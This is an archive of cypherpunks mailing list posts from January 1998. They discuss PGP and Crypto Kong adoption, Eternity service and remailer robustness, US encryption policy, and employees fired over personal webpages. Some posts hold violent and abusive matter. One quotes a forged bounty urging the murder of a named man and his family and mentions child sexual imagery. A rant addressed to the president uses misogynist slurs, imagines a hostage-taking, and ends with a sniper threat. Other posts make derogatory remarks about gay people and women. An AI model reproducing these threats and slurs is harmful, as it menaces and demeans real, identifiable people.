>so, and what type of methods, used toward that end, would be moral?
>

no one can be "made" to do anything, even in a tyrannical environment.
even in a tyranny a person has the choice of disobeying authority.

Rand had one way of promoting what she saw as integrity-- writing about
it, lobbying about it, philosophizing about it. she was a bit
fanatical at times about her beliefs-- which were very much about
morality and integrity, only defined in an unusual way. more power to
her, I say. a step in the right direction.

another way would be to confront publicly those that seem not to care about
integrity or morality, engage in a sort of socratean dialogue about it,
and let the lurkers decide for themselves if they are really the moral 
vacuums some appear to be, and whether they (the lurkers) wish to
follow that path. goring sacred cows and seeing where the blood flows,
so to speak.

the public will begin to care about integrity and morality when it realizes
that the pain of failing to do so is not worth the immediate gratification
the vacuity seems to provide. that this will happen is not assured.

(somehow this thread has been sustaining itself on its own, despite my
increasing lack of interest as the group mind wanders far from my 
original points, which again I find obvious and barely worth rebutting.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Thu, 15 Jan 1998 10:35:47 +0800
To: "'cypherpunks@toad.com>
Subject: Symantec Norton, Your Eyes Only.
Message-ID: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980115022504Z-10630@ixf2m1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain




Hey all,

Just wondering what people think of this product?
Good, bad or ugly?

Is there an international version and a US version?

If so, what limitations are in the international version?

Many thanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Fri, 16 Jan 1998 03:19:12 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Crypto Kong penetration.
In-Reply-To: <199801151836.KAA13648@proxy3.ba.best.com>
Message-ID: <Pine.SUN.3.96.980115141047.16035E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 15 Jan 1998, James A. Donald wrote:

> Secondly, PGP simply is not being adopted by the masses.  Of
> course right now, two weeks after release, Crypto Kong is not
> being adopted by the masses either, but with very little
> identity management, it is far easier for the masses to use.
> 
> If you try and shove that identity stuff onto people they
> will not do it.  Too much like hard work.  They will happily
> let the government licensed authorities do it for them.  The
> PGP model clearly has not flown yet, and it is not going to
> fly.

IMHO, this is pure grade A bullshit.  If you included PGP in MsMail, and
Eudora and pine and elm from the get go, everyone would use it.  Poeple
use what they have and few learn about what they could use.  PGP for the
masses has been a widely discussed topic here.

Unless you can convice the mailer makers to include Crypto Kong in the
mailers, you're not gonna get any mass adoption either.  Still it's likely
to be much less than PGP anyway since it's already been out for ages.
Still there are plenty of plugins for Eudora to do PGP mail, and those who
know about it and need it use it.  The rest, well, they don't know and
won't know until someone snoops their mail and they get a bug up their
asses to get privacy.

Regardless of how good your program, if you ignore the basic facts and
stick to "Crypto Kong has feature X,Y,Z which PGP lacks" you won't get
anywhere either.

Mind you I'm not comparing PGP, nor Crypto Kong on any feature or security
level, just basic human nature.  If you get Microsoft to incorporate it in
every copy of win 98 and Office, you can bet fuckloads of people will use
it.  If you can get all the ISP's out there that offer service and
software to include it, you can bet a lot of people will use it, etc.


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Fri, 16 Jan 1998 03:47:51 +0800
To: cypherpunks@ssz.com
Subject: (eternity) Mailing List Archives
Message-ID: <199801151939.OAA01030@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


I've put the archives of the Eternity Mailing List (eternity@internexus.net)
up on http://sof.mit.edu/eternity/mail-archive/

The mailing list is host to discussion of the theoretical issues behind
Eternity service, Blacknet, Adam Back's Eternity USENET implementation,
and my forthcoming Eternity DDS implementation.

(7 articles got lost from the archive while I was setting it up.  I sent
them to itself as "missing articles 86-92".  I'll restore their
original headers at some point.)
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNL5mBqwefxtEUY69AQFZrAgAhJA1xWUTf4nPKvT17U9tBnrPt2EwP9Hv
dx3QruMmZqodAES7ot6h0YQN6Wi/Chw8RosjCqRXZq+zkayUBVX376gTF4i0+Vpf
MocwfB8plXTmjfBahcfjb+WxeEuGEefw3BGCGKpYM/y5uZ925GJsq/+R6MeA2FjQ
t+RWcqeMbSRAz4T3s8ThPQtr9dIi3dJgh4gEq9aAD+0cH4lOZFAsc3NA8YMWHptR
M++ZvHYCLvwm5mb01bNJ9w8BGzU7dVFzxmJfxhZqb+0DJvK++8uQeflSUmILP9uf
yXc+O+pYjuW2ho9ozzSlcbbSEPWdyAO03Qaty8bLdxy0DeaFmTWyoQ==
=US5o
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Fri, 16 Jan 1998 04:23:54 +0800
To: cypherpunks@toad.com
Subject: BUG Bounty...
Message-ID: <v03102842b0e4191da2db@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain




My publisher is reprinting _Digital Copyright Protection_, a
book that describes how to use encryption and steganography to
control digital data. I get to fix any problems that are out
there. To encourage people who may have spotted errors, I'm
offering a bounty of $20 to the first person who reports an
error subject to the following limitations:

* The errors must be technical. I appreciate anyone who wants to
correct my grammar, but I think that these types of errors are
too hard to pin down. We could spend more time arguing than
solving them.

* I reserve the right to aggregate errors and determine the
right way to split them up. This isn't a loophole, it's just a
way to prevent someone from noting a pattern and asking to be
paid for each separate occurance. For instance, imagine that
someone notes that I forgot to put a page number on a blank page
at the front of the book. Is every page number after that wrong?
I promise I won't use this as a loophole.

* I reserve the right to make arbitrary judgements about the
"first" person to submit a claim. This is to prevent a club of
people from finding an error and reporting it in synchrony. I
may choose to pay each person the $20 reward, choose one I feel
is most deserving, or even split the reward n ways. It's up to
me. I'll probably choose the first one unless there are
extenuating circumstances.

Thanks to everyone who takes part in this project. Let me know
if you have any questions. In the past, I've found that few
people reported the errors and I'm hoping that $20 will be
enough of an inducement. Perhaps there are no errors there? This
is the best way to prove a negative.

Thanks again,

Peter Wayner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 16 Jan 1998 09:16:00 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Microsoft Metaphors (fwd)
In-Reply-To: <199801151547.JAA05542@einstein.ssz.com>
Message-ID: <3.0.5.32.19980115170713.008b2b90@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> What are the best metaphors to use when talking about a browser and an
>> operating system? Is the combination like a car and an engine, or a car and
>> a roofrack? A pair of gloves?
>
>It seem to me to be like a car and a road map. It simply lets you address
>the multiplicity of resources (ie destinations) out there in a convenient
>model.

Or maybe a rental truck and a portable storage space.
One of Microsoft's big problems is that if what you want to do is
haul big stuff from place to place, you don't care what brand of truck/car
you use to pull your U-Haul Brand trailer, and similarly if what
you want to use is a Web browser with a Java engine that runs
platform-independent Java apps, you don't care if it's running on
Win95, Linux, SunOS, NintendoJava, or MacNeXTsTep.
So they want to sell you that Pickup-mounted camper that
only fits on a big Microsoft pickup-truck, as well as selling you
some GlueOn Fuzzy Dice that can't be uninstalled cleanly from rental
cars so you just buy the truck from them.
And they want to give you Internet Exploiter free, so you're stuck with
Fuzzy-Dice-Compliant Windows, rather than letting you get used
to Java-based browsers that run on anything. 
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Fri, 16 Jan 1998 06:19:51 +0800
To: cypherpunks@ssz.com
Subject: E (the java extension, not MDMA)
Message-ID: <199801152210.RAA01721@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


After someone mentioned "E", Electric Communities (http://www.communities.com/)
enhancement to the Java security model/language/etc., I checked it out

It looks useful for a distributed agents based system (which is what
I'm shooting for...the long-awaited goals mailing will either get sent
today or tomorrow, depending on if I fall asleep immediately after sending 
this).

I don't think anyone will argue that it's inherently bad.  However, I'm
interested in knowing what people think about using a vaguely proprietary
product (albeit from a company with lots of cool people) in a piece of
software like a reference Eternity implementation.  I personally would prefer
to stick to something as standard as possible, but E has a lot of features
I'd want to use, and would end up re-implementing on my own.

(I think if you had a JVM interface to eternity such that an object, its
currency, where it should send its results, etc. in a standard form
(the standard eternity agent encapsulation) were encapsulated, you
could build a lot of Eternity out of interacting agents inside another
Eternity implemention, inside ... up to inside a traditional network.
(more on this idea later))

So, this is very rambling -- I mostly wonder how people feel about using
a fairly non-standard language extension in something like Eternity.

Ryan

[ObDentistry: Wisdom teeth *really* suck.  I want drugs.]
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNL6JcKwefxtEUY69AQGs0Qf/TubvdreDInDvT89R8UGHd1TohudBCwYE
KWq66zhULQh0YAdn2ZoL4rT9lhxWJ/QE0el8sLxmp9CgjwnMi8l7uA8eKB3RSi0s
l6zgx96PJYLvAtI+S7gYcLAKf9RvHH5TzyWpT/WoiePb4Wd8YI0Z3DthdEdd4xMs
gKqmyOO6JpX+SPXF89shN33j1LXfFmvq10XWlCW15XLyyA72WwoWbKQHu40uliAd
rsM+CRacNN7K3Gc9OV4IWORnmIciZbJ1EZbO8kyZU3YlYvOB+QyZpnaYvFuzyLtS
Iyud5WaVVRM7mGn9FS9WwSaxqxMrRRv25FutM9muHmAIufaxnMVeQA==
=GQr/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Fri, 16 Jan 1998 01:49:27 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Crypto Kong penetration.
In-Reply-To: <199801142049.MAA02259@proxy4.ba.best.com>
Message-ID: <19980115173121.01572@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Jan 14, 1998 at 12:49:52PM -0800, James A. Donald wrote:
>     -- 2
> Since release there have been a very large number of hits on
> the Kong documents, and mere 102 downloads of the program,
> and 74 downloads of the source code.
> 
> The large number of source code downloads indicates that I am
> only reaching the crypto techie audience, that for the most
> part is already able to use PGP, not the non tech audience
> that Crypto Kong was designed for.

Ummm why reinvent the PGP wheel in an exclusively Win32 form?  PGP (at
least 2.x) has undergone peer review and seems secure.  Is that true of
your system?

I don't wish to sound too negative and there are interesting features
(small EC keys for one and smaller signatures).

Another interesting and similar program is Pegwit which is portable code
and also has these advantages.

Pegwit
http://ds.dial.pipex.com/george.barwood/v8/pegwit.htm

But there is an intrastructure of PGP key servers and most people have
PGP keys, already.  Maybe we should be building on standards rather than
building new ones.

Of course PGP isn't GPLed but we will have g10 soon which will be
real freeware and developed outside the USA to avoid legal problems

ftp://ftp.guug.de/pub/gcrypt/g10-0.1.3.tar.gz 

Its *very* prebeta but maybe will become the cypherpunk program of
choice.

There is also a freeware SSH ("Psssst") planned I think by someone else.

-- 
Steve 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 16 Jan 1998 07:08:45 +0800
To: cypherpunks@cyberpass.net
Subject: Presidential advisor on the "problem of encryption"
Message-ID: <v03007805b0e4447a9005@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Presidential advisor Jim Steinberg spoke across the street from my office
this afternoon at the Mayflower Hotel, addressing the European Institute.
He said:

	...we will pay a price if the United States and
	the EU cannot work together effectively
	to address the problem of encryption in a way
	that allows our cutting-edge industries to
	thrive, our citizens to have security in their
	communications, while at the same time
	protecting common public security interests.

Translation: the government gets a backdoor to your encrypted files. Read
on for more. (BTW, Steinberg is deputy assistant to the president for
national security affairs. Also Deputy National Security Council Advisor
and formerly the director of the State Department Policy Planning Staff.)

Background:
  http://cgi.pathfinder.com/netly/afternoon/0,1012,1626,00.html
  http://cgi.pathfinder.com/netly/opinion/0,1042,1385,00.html

-Declan


"We also need to find better ways to harness our efforts to
counter the kinds of new crimes looming ahead in the next
century.  We have made considerable progress through the
Summit of the Eight, taking new steps to increase airline
security, to protect our infrastructures, to fight
cyber-crime and, most important, to promote nuclear safety.
 We are encouraged that Prime Minister Blair has identified
cooperative law enforcement as a major topic for the
Birmingham Summit this May.  We have been somewhat
disappointed that Europe has not strengthened its
cooperation with us on the vital third pillar.  I am
particularly concerned about the lack of enthusiastic
support for the U.S.-sponsored international Law Academy in
Budapest. Full integration in the Euro-Atlantic community
means that all of our police forces must have the
confidence to work together against transnational threats.
It is vital that the emerging democracies enjoy the rule of
law during their transition period, and we will pay a price
if the United States and the EU cannot work together
effectively to address the problem of encryption in a way
that allows our cutting-edge industries to thrive, our
citizens to have security in their communications, while at
the same time protecting common public security interests.

"But the gravest and most immediate challenge before us is
to find more common ground between the United States and
Europe in dealing with states that threaten our common
interests.  We have started to fall into a troubling
pattern of good cop/bad cop.  This pattern, whereby Europe
provides the carrot, and the United States is left holding
the stick, is unhealthy for both sides, and only benefits
our common adversaries.  While we all believe that dialogue
and engagement are the preferred course, dialogue should
not be an excuse for inaction when countries like Iraq fail
to live up to Security Council resolutions, and other
nations import weapons of mass destruction and export
terror.  This divergence compromises the effectiveness of
our shared efforts."




--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 16 Jan 1998 07:59:22 +0800
To: cypherpunks@toad.com
Subject: Re:  Chris Lewis's death?
Message-ID: <199801152323.SAA14920@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



For the majority of you who have killfiled Dr. Dim V.,
add these killfile keywords:

   Chris Lewis
   cauce
   vznuri@netcom.com   "Vladimir Z. Nuri" (nym for Dr. Dim)
   freedom-knights@jetcafe.org
   @pgh.org

   >   Date: Thu, 15 Jan 1998 03:05:56 -0500
   >   From: "Dr. Zeus" <zeus@alt.net>
   >   Reply-To: zeus@alt.net
   >   To: freedom-knights@jetcafe.org
   >   CC: cypherpunks@toad.com, usenet@pgh.org
   >   Subject: Chris Lewis's death?
   >   
   >   > >CAUCE, the enforcement branch of the Internet administration, is dedicated to
   >   > >exterminating all SPAMMERS by any means necessary. CAUCE wants Chris Lewis and
   >   > >all other SPAMMERS dead, and will gladly pay the $50,000 (canadian) reward to
   >   > >whomever KILLS Chris Lewis and his family, who reside in a suburb of Ottawa:
   >   
   >   I think we should leave the family out of this, and instead killing
   >   Chris Lewis, just get him fired from Nortel
   >   
   >   > >After you kill Chris Lewis and his family, please see http://www.cauce.org
   >   > >for information on how to collect your CAUCE reward.
   >   > 
   >   > This is fucking censorship!  I'm putting the notice of the CAUCE reward on my
   >   > web home page at http://www.panix.com/~guy, right next to the pictures of the
   >   > pre-teen kids screwing.  Fuck you, Zorch, you're next after C, P, and G Lewis.
   >   > 
   >   > ---guy  [ <- forgery ]
   >   
   >   Just6 who is this "guy?"

MUHAHAHAHAHAHAHAHA

Dr. Dim can't even spell.

   >   From: Admin Pgh Plan <pghmain@pgh.org>
   >   X-Sender: pghmain@www3.localweb.com
   >   To: freedom-knights@jetcafe.org
   >   cc: cypherpunks@toad.com
   >   Subject: Re: Chris Lewis's death?
   >   
   >   Let us concentrate on getting Lewis fired
   >   rather than killing him.  Killing Nortel
   >   would be a much better idea.

Dr. Goober is toothless.

---guy

   Which is handy, considering his favorite position
   is kneeling before Dr. Dim.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 16 Jan 1998 10:43:57 +0800
To: Adam Back <rdl@mit.edu
Subject: Re: remailer resistancs to attack
In-Reply-To: <199801151705.MAA03621@the-great-machine.mit.edu>
Message-ID: <v03102800b0e473032403@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:25 PM -0800 1/15/98, Adam Back wrote:
>Ryan Lackey <rdl@mit.edu> writes:
>> (Eternity-USENET is vulnerable to technical Denial of Service attacks
>> with the current small number of indexing servers, even if it is protected
>> from legal issues.  I think illegal or extralegal attacks are as dangerous
>> as the legal ones)
>
>Public access servers aren't a good idea.  Really people should be
>running local access servers only.  The index is local, cache is
>local, and USENET is a distributed broadcast medium.
>
>Seems close to ideal to me, the problem being as Tim points out:
>bandwidth limitations.  The bandwidth limitation is debilitating; to
>overcome this we have to relax security, for example by using
>remailers rather than USENET for all but indexes of documents.

This was my point, and has been for years (though not in the context of
"Eternity"). To wit, save the bandwidth for _pointers_, not raw data.

To make this concrete, suppose Alice is in possession of a set of
photographs of Bill Clinton engaged in sex with his mistresses (Paula
Jones, Gennifer Flowers, Tammy Faye Baker, Margaret Thatcher, etc.). The
file size is 5 MB.

The pointer to this file is _much_ shorter, namely, a text description,
and/or possibly a set of blurred thumbnails.

And if the file is only occasionally requested (or purchased), it makes no
sense to blast it to the Usenet frequently (*).

(* And how frequent is frequent, even in Eternity Usenet? I argue there is
little point in blasting such files on a weekly basis, say, as even that is
*much too slow* for someone who really wants the file NOW. A "call and
response" response system, to borrow a phrase from the blues, makes a lot
more sense.)

Additional dimensions or axes are: how many requestors? and how many suppliers?

>One criticism I noticed several people raise was that USENET would be
>shut down as a way to kill eternity USENET when something
>controversial gets posted.

I have not argued this. Usenet is notoriously hard to "shut down."

However, it is quite likely that newsgroups carrying vast amounts of
"Eternity Usenet" stuff will overload the system and effectively force the
newsgroup to not be carried by many sites (just as alt.binaries.pictures.*
groups are already excluded from many newsfeeds, for both bandwith/storage
and naughtiness reasons).

>However it seems to me that the weakest point is the remailer network.
>It seems likely that it would be much easier for governments to shut
>down the remailer network than it would be to shut down USENET.  There
>are only around 20 or so remailers, and they all have known IP
>addresses, operators, localities, etc.  I expect the spooks could shut
>them down with less than 1 days notice if they wanted to.

Well, I have long argued for the need for thousands of remailers, esp. the
"everyone a remailer" model.

But, although I agree we need many  more remailers, I think Adam overstates
the ease with which remailers can be shut down, at least in the U.S.

Although there are many "extralegal" atrocities committed in the U.S., as
in all countries, consider some "protections" which exist in the U.S. (I am
no expert on English common law, so will confine myself to the U.S., where
at least I have some knowledge):

1. The First Amendment is incredibly powerful ammunition against a blanket
shut down of "speakers" or "publishers."  Vast amounts could be written on
just this one point. Basically, if the U.S. Government was constitutionally
unable to stop even the publication of the Pentagon Papers, how could Joe's
Remailer be enjoined from passing along received messages?

2. Even a hypothetical law requiring senders to identify themselves, seen
by some as an end to remailers, would be easily surmounted by interpreting
remailers as "commenters." By this I mean the following:

"Hey, Fred's Commenter Remailer, look at the weird message I just received:


lke[i=39023pok=94pk[e=f
3r93ir=-039r=30r9p0ir-3r9i3=r0923=
1-903u-q938-398-9
etc.

Any comments on what this means?"

In other words, unless the right to _comment_ on a received letter or
message is quashed, I can simply comment on such messages. (Of course,
Fred's Commenter Remailer would do the same with the next in line....

I mention this not because I think it is likely, but to show the can of
worms the government would open if it tried to "ban remailers."

3. Encrypted speech is speech. So long as speech is legal, encrypted speech
is legal. Any law limiting encrypted speech is limiting speech (in an
overbroad way, not the narrowly defined "shouting fire" cliches).

So long as encrypted speech is legal, remailers will be legal.

--Tim May




>
>So, where would blacknet, and eternity USENET be after that?
>
>How do we improve the resistance of the remailer network to well
>resourced attackers intent on dismantling it?
>
>Adam


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 16 Jan 1998 10:52:42 +0800
To: ravage@ssz.com
Subject: Re: Personal webpages can get you fired [CNN]
In-Reply-To: <199801160129.TAA08009@einstein.ssz.com>
Message-ID: <v03102801b0e479088e30@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:46 PM -0800 1/15/98, Mark Rogaski wrote:

>Not all that surprising.  If Barrett suggested his pages as an example,
>that makes them part of his curriculum.  Curriculums that don't fit in
>with the Diversity model are usually pretty short-lived.  That's a big
>"Duh" on his part.

And as with the AOL case of Timothy McVeigh (no, not _that_ one) being
kicked out of the Navy for labelling himself as "gay" and as a "boy hunter"
on one of his AOL profiles, there are already calls for new privacy laws.

Which misses the point. By illegalizing the keeping or disclosing of
lawfully obtained information, greater harm is done.

I heard Nadine Strossen of the ACLU arguing today that more laws are needed
to "prevent" these "abuses." In fact, more _technology_ is what's needed.
The technology of Web proxies, remailers, nyms, and such.

(As to what I personally think about these cases...the Barrett case strikes
me as just another PC firestorm, with someone being fired by a scared
college for fear of lawsuits by offended womyn and sistas. But Barrett was
dumb to tell his students about his non-PC page. As for the McVeigh case,
if the Navy allows gay soldiers and sailors....well, I can guess most
straights will refuse to volunteer for the Navy. Again, in a corporation or
such it should be their right to refuse to accept gays, or straights, or
blacks, or whatever they choose. That it is a taxpayer-funded enterprise
makes the case much more confusing and, probably, irreconcilable.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 16 Jan 1998 09:04:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Personal webpages can get you fired [CNN]
Message-ID: <199801160129.TAA08009@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>      Barrett   January 15, 1998
>      Web posted at: 5:47 p.m. EST (2247 GMT)
>      
>      TRAVERSE CITY, Michigan (AP) -- Hired to teach computer technology
>      at a marketing company, Cameron Barrett suggested his trainees check
>      out his Web page, where he published his own fiction.
>      
>      Some women staff members did, and were shocked by the violent and
>      sexually explicit passages.
>      
>      They complained to their boss, and Barrett was fired.

[text deleted]

>      "Just as people need to watch what they say in real life, what you
>      put on your Web page is going to be visible to everyone, including
>      future employers," said Esther Dyson, a director of the Electronic
>      Frontier Foundation in San Francisco.
>      
>   Personal Web pages aren't considered private
>   
>      Although the First Amendment prevents the government from stifling
>      speech, private employers are under no such constraints.
>      
>      Companies can fire people for comments deemed inappropriate, and
>      experts warn that personal Web sites, even if done at home, are
>      public venues that employers can use to determine who is suitable
>      for the company.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
Date: Fri, 16 Jan 1998 10:03:40 +0800
To: ravage@ssz.com
Subject: Re: Personal webpages can get you fired [CNN]
In-Reply-To: <199801160129.TAA08009@einstein.ssz.com>
Message-ID: <199801160147.UAA24236@deathstar.jabberwock.org>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Jim Choate wrote:
: 
: Forwarded message:
: 
: >      TRAVERSE CITY, Michigan (AP) -- Hired to teach computer technology
: >      at a marketing company, Cameron Barrett suggested his trainees check
: >      out his Web page, where he published his own fiction.
: >      
: >      Some women staff members did, and were shocked by the violent and
: >      sexually explicit passages.
: >      
: >      They complained to their boss, and Barrett was fired.

Not all that surprising.  If Barrett suggested his pages as an example,
that makes them part of his curriculum.  Curriculums that don't fit in
with the Diversity model are usually pretty short-lived.  That's a big
"Duh" on his part.

Mark

- -- 
[] Mark Rogaski                   "That which does not kill me
[] wendigo@pobox.com                 only makes me stranger."
[]
[]      finger wendigo@deathstar.jabberwock.org for PGP key
[] anti spambot: postmaster@localhost abuse@localhost uce@ftc.gov

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNL68EHzbrFts6CmBAQFcNAf9HLlKRRkxU432Auzml50ekYGNJIZX1EXQ
LGAccA+wA80/zLq/cDkXPjn2Ce0z6skmI9zQ2a8BNblm1mn4hbHFMVFlffvd2CRj
OANASDTxkgwPQcGPSes/CukQ72BYip1aE2CxX2WwgnsKOrMhGGsJ07K7nNhOza3i
f8i5N6W/3EHP64pXKOQ2iWVQWzGXTZDW4YHI6DziUD2wXlpphkhoPQUseWA+2W4/
1ikHP8UKuqE+UXpBUKFNyjVYDhdlKDUiHlOcAj1OnGJGNL4JBxa/6jeZFOA1oCdO
tT9Orsco8pXoezP5rrajqHJ453RWSZUcxCoC0BDev0XjHEARd/nm/A==
=TA1+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Fri, 16 Jan 1998 14:24:58 +0800
To: president@whitehouse.gov
Subject: I'm going to count to ten...
Message-ID: <34BEF573.1221@dev.null>
MIME-Version: 1.0
Content-Type: text/plain



BadBillyC,
  I thought you'd finally come to your senses.
  The headline read, "Clinton Urges Feinstein To Run." Delighted, I
scanned the page for the picture of you pumping a round into the
riot gun, with a caption quoting you as saying, "I'm going to count
to ten..." Sadly, upon reading the accompanying news blurb, it became
apparent that the women in your life give you just as much trouble
when you're keeping Little Peter out of the relationship, as they do
when you let him bend you to his will.

  Jesus, BillyC, where do you get these broads?
  It's par for the course for a politician to have the morals of a two
dollar whore, but when they have the brains and the heart of a two
dollar whore, as well, then you can't hang out with them without 
"gettin' some on'ya."
  As far as that mutt-faced, child-murdering bitch in Justice goes, I
assumed that Buddy was brought in to replace her, but I was wrong again.
If that dumb Nazi cunt keeps popping up in the SunSite GunSight I've
got trained on BadBillyG, then I'm going to take care of her sorry ass
by telling BillyG how to tie her tubes in a knot.
  1. Buy the Branch Davidian compound in Waco, and begin construction
 on the new MicroSoft Headquarters Building.
  2. Place media ads suggesting that the citizens of Redmond consider
 sending their children to a safer location until the DOJ action against
 MicroSoft has reached a conclusion.
  3. Hold employee fire drills twice a day, and give visitors to
 MicroSoft Headquarters a sheet containing safety instructions in
 the event of an armed government assault during their visit.
  4. Train bright lights and blaring loudspeakers on the MicroSoft
 Compound several times per day, in order to prepare employees for
 possible government action.

  Think I'm kidding, Bubba?
NEWS FLASH!!! 
San Francisco Chronicle / January 13, 1998 / Page C1
SUN FOCUSES IN ON NT MARKET - New Unix workstations priced as low as $3,000
  Sun Microsystems today will launch a new line of inexpensive workstations aimed at blunting the spread of 
powerful Windows NT
desktop computers in the high-profit technical market.
...

  Golly, gee. The poor bastards are being forced by BadBillyG to
offer their products at a reasonable price in order to get a share
of the market. Isn't life hard...
  After years of waiting for these pricks to begin facing enough
competition to have to come down off of their high-horse and deliver
a product at a price the average joe could at least contemplate, the
DOJ is trying to put a lid on the competitor who is delivering the
goods for a reasonable price.

  Netscape? I got MicroSoft Exploiter for free, but I still use 
Netscape, which I also got for free.
  Buy Netscape? Kiss my lily-white ass, Bubba. I pay for the son-of-a-
bitch every time it takes me five minutes, instead of one, to download
the ton of advertising on a website that is brought to me courtesy of
the wonderful browser folks who are designing their software for
corporate advertising and sales departments, instead of for my benefit.

  Let's get our cards on the table here, BillyBob.
  I'm sure that you're getting some good campaign-contribution mileage
out of the Micro$not Ba$her Coalition, and would like to squeeze M$
for a good chunk of change, as well, but there is a serious flaw in
your game-plan.
  For starters, BadBillyG already gets much of what he wants by 
working the actual power-points in the corporate/political structure,
instead of fucking away large amounts of time, money and energy on
the power-players who may or may not be able to control those who
actually control the power-points.
  Secondly, you cannot be certain that myself or some other lunatic
will not storm M$ Corporate Headquarter$ and take the employee$ ho$tage,
demanding that BillyG donate a million dollar$ a day to the Democratic
Election Campaign to guarantee their $afe release. While the public is
willing to pretend that the anti-trust action is for their benefit, I
sincerely doubt that they are willing to be made fools of by denying
the obvious implication that such an action would be consistent with
current political maneuvers, but infinitely more direct and honest than
the maze of deceit and lies that those currently in power use to achieve
the same ends.

  I am beginning to froth at the mouth and drool on myself, so I suppose
that I should get to the point, and sign off shortly.

Bottom line: Look out of your office window. Do you see the sniper,
  sitting on the rooftop of...

